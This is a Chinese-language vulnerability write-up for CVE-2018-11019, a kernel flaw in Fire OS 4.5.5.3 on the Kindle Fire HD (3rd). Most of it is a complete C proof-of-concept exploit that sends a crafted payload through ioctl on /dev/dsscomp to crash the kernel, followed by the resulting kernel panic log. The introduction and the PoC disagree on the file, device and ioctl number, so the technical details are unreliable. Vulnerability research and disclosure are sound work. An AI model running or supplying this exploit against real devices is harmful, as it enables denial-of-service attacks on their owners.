CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
一、漏洞简介
Amazon Kindle Fire HD(3rd)是美国亚马逊(Amazon)公司的一款Fire OS平板电脑设备。Fire OS是运行在其中的一套专用于Amazon设备的基于Android开发的移动操作系统。kernel是其中的一个内核组件。 Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3版本中的kernel组件的kernel/omap/drivers/misc/gcx/gcioctl/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令利用该漏洞注入特制的参数,造成内核崩溃。
二、漏洞影响
Fire OS 4.5.5.3
三、复现过程
poc
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
* Related buggy struct name is dsscomp_setup_dispc_data.
* This Poc should run with permission to do ioctl on /dev/dsscomp.
*
* The fowllwing is kmsg of kernel crash infomation:
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
const static char *driver = "/dev/dsscomp";
static command = 1118064517;
int main(int argc, char **argv, char **env) {
unsigned int payload[] = {
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141 };
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
崩溃日志
[ 164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
[ 164.802459] pgd = c26ec000
[ 164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
[ 164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[ 164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 164.827239] CPU: 1 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 164.834686] PC is at dev_ioctl+0x4ac/0x10c4
[ 164.839416] LR is at down_timeout+0x40/0x5c
[ 164.844146] pc : [<c03178e8>] lr : [<c006e9b8>] psr: 60000013
[ 164.844146] sp : c25a1e70 ip : c25a1e50 fp : c25a1f04
[ 164.857116] r10: 00000000 r9 : d8c0aca8 r8 : bed5c610
[ 164.863128] r7 : c0a25b50 r6 : c25a0000 r5 : bed5c610 r4 : 0000000f
[ 164.870391] r3 : 00001403 r2 : 00000000 r1 : 20000013 r0 : 00000000
[ 164.877807] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 164.885894] Control: 10c5387d Table: 826ec04a DAC: 00000015
[ 164.892303]
[ 164.892333] PC: 0xc0317868:
[ 164.897308] 7868 30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f
[ 164.907989] 7888 e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064
[ 164.918670] 78a8 e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060
[ 164.929351] 78c8 e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0
[ 164.939880] 78e8 e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070
[ 164.950561] 7908 e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064
[ 164.961212] 7928 ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064
[ 164.971771] 7948 e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088
[ 164.982299]
[ 164.982330] LR: 0xc006e938:
[ 164.987426] e938 e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005
[ 164.997955] e958 e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4
[ 165.008636] e978 e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000
[ 165.019317] e998 e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794
[ 165.029846] e9b8 e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d
[ 165.040374] e9d8 e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008
[ 165.051055] e9f8 e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004
[ 165.061737] ea18 e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d
[ 165.072265]
[ 165.072265] SP: 0xc25a1df0:
[ 165.077362] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[ 165.087890] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[ 165.098419] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[ 165.109100] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[ 165.119781] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[ 165.130340] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[ 165.141021] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[ 165.151702] 1ed0 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610
[ 165.162353]
[ 165.162384] IP: 0xc25a1dd0:
[ 165.167327] 1dd0 c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001
[ 165.178009] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[ 165.188537] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[ 165.199249] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[ 165.209899] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[ 165.220581] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[ 165.231109] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[ 165.241790] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[ 165.252441]
[ 165.252441] FP: 0xc25a1e84:
[ 165.257415] 1e84 c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff
[ 165.268066] 1ea4 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000
[ 165.278717] 1ec4 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40
[ 165.289276] 1ee4 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044
[ 165.299926] 1f04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 165.310607] 1f24 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[ 165.321136] 1f44 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[ 165.331695] 1f64 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400
[ 165.342346]
[ 165.342376] R6: 0xc259ff80:
[ 165.347320] ff80 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[ 165.358001] ffa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.368682] ffc0 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[ 165.379241] ffe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.389770] 0000 00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00
[ 165.400451] 0020 00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8
[ 165.411132] 0040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[ 165.421661] 0060 005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.432342]
[ 165.432342] R7: 0xc0a25ad0:
[ 165.437316] 5ad0 00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03
[ 165.447875] 5af0 01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005
[ 165.458526] 5b10 01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001
[ 165.469207] 5b30 ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001
[ 165.479736] 5b50 00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000
[ 165.490417] 5b70 00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000
[ 165.500946] 5b90 00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001
[ 165.511627] 5bb0 c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8
[ 165.522186]
[ 165.522186] R9: 0xd8c0ac28:
[ 165.527282] ac28 d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 165.537841] ac48 00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 165.548492] ac68 5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000
[ 165.559020] ac88 00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000
[ 165.569702] aca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 165.580261] acc8 d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda
[ 165.590911] ace8 2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000
[ 165.601593] ad08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24
[ 165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
[ 165.619445] Stack: (0xc25a1e70 to 0xc25a2000)
[ 165.624359] 1e60: 00000001 00000028 000fffff c25a1ea0
[ 165.633605] 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8
[ 165.642822] 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14
[ 165.652038] 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000
[ 165.661102] 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08
[ 165.670318] 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 165.679565] 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004
[ 165.688781] 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004
[ 165.697875] 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000
[ 165.707092] 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8
[ 165.716308] 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610
[ 165.725402] 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624
[ 165.734619] 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000
[ 165.743835] Backtrace:
[ 165.746856] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 165.756256] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 165.765502] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 165.774780] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
[ 165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028)
[ 165.793060] Board Information:
[ 165.793060] Revision : 0001
[ 165.793060] Serial : 0000000000000000
[ 165.793090] SoC Information:
[ 165.793090] CPU : OMAP4470
[ 165.793090] Rev : ES1.0
[ 165.793121] Type : HS
[ 165.793121] Production ID: 0002B975-000000CC
[ 165.793121] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 165.793121]
[ 165.844757] ---[ end trace aba846a2af6e75b7 ]---
[ 165.850097] Kernel panic - not syncing: Fatal exception
[ 165.856109] CPU0: stopping
[ 165.859252] Backtrace:
[ 165.862274] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 165.871643] r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[ 165.878784] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 165.887908] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 165.897399] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[ 165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80)
[ 165.912384] fc20: c153a9f8 00000000
[ 165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
[ 165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
[ 165.940032] r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
[ 165.947052] [<c010a534>] (follow_page+0x0/0x238) from [<c010af94>] (__get_user_pages+0x13c/0x3f0)
[ 165.957031] [<c010ae58>] (__get_user_pages+0x0/0x3f0) from [<c010b350>] (get_user_pages+0x50/0x58)
[ 165.967102] [<c010b300>] (get_user_pages+0x0/0x58) from [<c00ff544>] (get_user_pages_fast+0x64/0x7c)
[ 165.977233] r4:d8caee3c
[ 165.980468] [<c00ff4e0>] (get_user_pages_fast+0x0/0x7c) from [<c01eeff0>] (fuse_copy_fill+0x1bc/0x238)
[ 165.990905] [<c01eee34>] (fuse_copy_fill+0x0/0x238) from [<c01ef0a4>] (fuse_copy_one+0x38/0x68)
[ 166.000579] r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
[ 166.007690] [<c01ef06c>] (fuse_copy_one+0x0/0x68) from [<c01efe64>] (fuse_dev_do_read+0x3e4/0x69c)
[ 166.017761] r4:dd243c00
[ 166.020874] [<c01efa80>] (fuse_dev_do_read+0x0/0x69c) from [<c01f03c0>] (fuse_dev_read+0x84/0x9c)
[ 166.030853] [<c01f033c>] (fuse_dev_read+0x0/0x9c) from [<c0124ecc>] (do_sync_read+0xb0/0xf0)
[ 166.040222] r7:00000000 r6:00000000 r5:00000000 r4:00000000
[ 166.047363] [<c0124e1c>] (do_sync_read+0x0/0xf0) from [<c01258f4>] (vfs_read+0xa4/0x148)
[ 166.056488] [<c0125850>] (vfs_read+0x0/0x148) from [<c01259d8>] (sys_read+0x40/0x78)
[ 166.065093] r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000
[ 166.073547] [<c0125998>] (sys_read+0x0/0x78) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 166.082855] r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010
[ 166.091217] CPU0 PC (0) : 0xc0019b2c
[ 166.095397] CPU0 PC (1) : 0xc0019b2c
[ 166.099456] CPU0 PC (2) : 0xc0019b2c
[ 166.103515] CPU0 PC (3) : 0xc0019b2c
[ 166.107574] CPU0 PC (4) : 0xc0019b2c
[ 166.111785] CPU0 PC (5) : 0xc0019b2c
[ 166.115814] CPU0 PC (6) : 0xc0019b2c
[ 166.119873] CPU0 PC (7) : 0xc0019b2c
[ 166.124084] CPU0 PC (8) : 0xc0019b2c
[ 166.128112] CPU0 PC (9) : 0xc0019b2c
[ 166.132171] CPU1 PC (0) : 0xc003ee38
[ 166.136352] CPU1 PC (1) : 0xc003ee54
[ 166.140411] CPU1 PC (2) : 0xc003ee54
[ 166.144470] CPU1 PC (3) : 0xc003ee54
[ 166.148681] CPU1 PC (4) : 0xc003ee54
[ 166.152709] CPU1 PC (5) : 0xc003ee54
[ 166.156768] CPU1 PC (6) : 0xc003ee54
[ 166.160980] CPU1 PC (7) : 0xc003ee54
[ 166.165008] CPU1 PC (8) : 0xc003ee54
[ 166.169067] CPU1 PC (9) : 0xc003ee54
[ 166.173126]
[ 166.175048] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 166.175079]